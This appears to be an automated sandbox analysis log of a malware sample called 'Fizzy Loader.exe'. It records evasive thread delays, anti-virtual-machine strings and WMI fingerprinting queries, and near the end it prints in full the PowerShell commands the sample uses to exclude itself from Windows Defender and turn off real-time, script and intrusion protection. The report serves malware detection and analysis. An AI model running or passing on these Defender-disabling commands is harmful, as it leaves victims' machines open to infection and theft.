                        Source: C:\Users\user\Desktop\Fizzy Loader.exeMemory allocated: 172C8B40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597202Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597015Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596874Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596765Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596656Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596546Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596437Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596325Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596218Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596109Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596000Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595889Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595780Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595671Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595562Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595451Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595341Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595234Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595125Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595012Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594899Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594793Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594627Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594500Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594283Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594156Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594015Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593890Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593781Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593672Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593547Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593437Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593328Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593207Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593093Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592982Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592873Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592765Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592656Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592538Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592422Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592297Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592187Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592078Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591968Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591842Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591732Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591621Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591512Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591312Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591118Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 590948Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 590812Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeWindow / User API: threadDelayed 5698Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeWindow / User API: threadDelayed 4119Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5729Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4058Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2518Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 917Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4805Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 912Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5433Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 659Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2285
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 928
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -597468s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -597202s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -597015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596874s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596546s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596325s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596218s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595889s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595780s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595671s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595451s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595341s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595012s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594899s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594793s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594627s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594500s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594283s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594156s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593672s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593207s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593093s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592982s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592873s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592538s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592297s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592187s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592078s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591968s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591842s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591732s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591621s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591512s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591118s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -590948s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -590812s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6048Thread sleep count: 5729 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892Thread sleep count: 4058 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep count: 2518 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep count: 917 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880Thread sleep count: 4805 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1856Thread sleep count: 912 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 5433 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020Thread sleep count: 659 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1992Thread sleep count: 2285 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3276Thread sleep count: 928 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597202Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597015Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596874Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596765Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596656Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596546Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596437Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596325Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596218Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596109Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596000Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595889Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595780Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595671Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595562Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595451Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595341Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595234Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595125Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595012Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594899Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594793Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594627Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594500Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594283Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594156Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594015Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593890Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593781Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593672Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593547Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593437Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593328Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593207Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593093Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592982Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592873Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592765Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592656Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592538Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592422Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592297Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592187Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 592078Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591968Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591842Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591732Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591621Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591512Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591312Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 591118Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 590948Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 590812Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: Fizzy Loader.exe, ukUGV.scr.0.drBinary or memory string: vboxtray
                        Source: ukUGV.scr.0.drBinary or memory string: vboxservice
                        Source: Fizzy Loader.exe, ukUGV.scr.0.drBinary or memory string: qemu-ga
                        Source: ukUGV.scr.0.drBinary or memory string: vmwareuser
                        Source: Fizzy Loader.exe, ukUGV.scr.0.drBinary or memory string: vmusrvc
                        Source: ukUGV.scr.0.drBinary or memory string: vmwareservice+discordtokenprotector
                        Source: ukUGV.scr.0.drBinary or memory string: vmsrvc
                        Source: ukUGV.scr.0.drBinary or memory string: vmtoolsd
                        Source: ukUGV.scr.0.drBinary or memory string: vmwaretray
                        Source: Fizzy Loader.exe, 00000000.00000002.2618782970.00000172AEFA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe'
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe'Jump to behavior
                        Modifies Windows Defender protection settings
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
